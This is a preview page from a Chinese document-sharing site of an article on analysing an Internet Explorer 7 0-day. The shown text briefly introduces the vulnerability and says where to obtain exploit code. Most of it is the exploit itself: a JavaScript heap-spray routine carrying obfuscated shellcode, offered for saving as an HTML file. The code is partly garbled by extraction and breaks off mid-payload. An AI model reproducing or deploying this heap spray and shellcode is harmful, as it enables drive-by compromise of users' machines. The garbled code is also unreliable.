攻防实战:深入剖析最新IE7.00day漏洞利用代码.docVIP

攻防实战:深入剖析最新IE7.00day漏洞利用代码.doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
攻防实战:深入剖析最新IE7.00day漏洞利用代码.doc

  攻防实战:深入剖析最新IE7.0 0day漏洞利用代码~教育资源库   这几天国内几乎所有的媒体都用大幅的版面报道了IE7.0的最新漏洞,由于微软迟迟没有推出安全补丁,并且该漏洞能影响到所有使用IE控件的程序,包括各主要浏览器、邮件客户端、办公软件、Rss订阅器以及可嵌入网页的所有第三方软件,影响范围极其广泛!笔者做了一个试验,在Google浏览器中中搜索一下ie7.0 0day出来2700多条记录,各大杀毒厂商纷纷推出漏洞修复工具以及预防方法,感觉比MS08067漏洞还热闹,算是岁末安全界的一件大事。   12月9 日,国内一些安全界知名人士的blog纷纷贴出了漏洞代码,不少无赖网站都纷纷挂上了恶意代码已获取利益。笔者的几个朋友未能幸免,点击恶意网站后导致机器蓝屏无法加载系统,只得郁闷的重装。为了了解恶意代码的危害,提高大家的安全意识,笔者在这里对该恶意代码进行一个简单的分析,希望能对大家有所帮助,避免不必要的损失。   获取IE7.0 最新漏洞代码   1.获取IE7.0 0day代码   获取代码的一个最好的方式就是通过Google等搜索工具搜索,推荐在本地在虚拟机中使用VPN代理到Google英文版中搜索,相对而言国外会早于国内公布0day代码。关于该漏洞代码,现在很多安全和黑客网站都已经贴出了代码,如果没有该代码的可以到bbs/viep;extra=page%3D1(呵呵,顺便帮团队做下广告)将以下代码保存为将该代码保存为IE7_0day.htm,即IE7.0 0Day。 lt;script language=javascriptgt; if(navigator.userAgent.toLosie 7)==-1)location.replace(about:blank); function sleep(milliseconds) { var start=nee(); for(var i=0;ilt;1e7;i++) {if((nee()-start)gt;milliseconds) {break} } } function spray(sc) { var infect=unescape(sc.replace(/dadong/g,x25x75)); var heapBlockSize=0x100000; var payLoadSize=infect.length*2; var szlong=heapBlockSize-(payLoadSize+0x038); var retVal=unescape(%u0a0a%u0a0a); retVal=getSampleValue(retVal,szlong); aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize; zzchuck=nepleValue(retVal,szlong) { while(retVal.length*2lt;szlong) {retVal+=retVal} retVal=retVal.substring(0,szlong/2); return retVal } var a1=dadong; spray(a1+9090+a1+dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121 dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9 dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9 dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9 dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9 dadong2121dad

文档评论(0)

ggkkppp + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档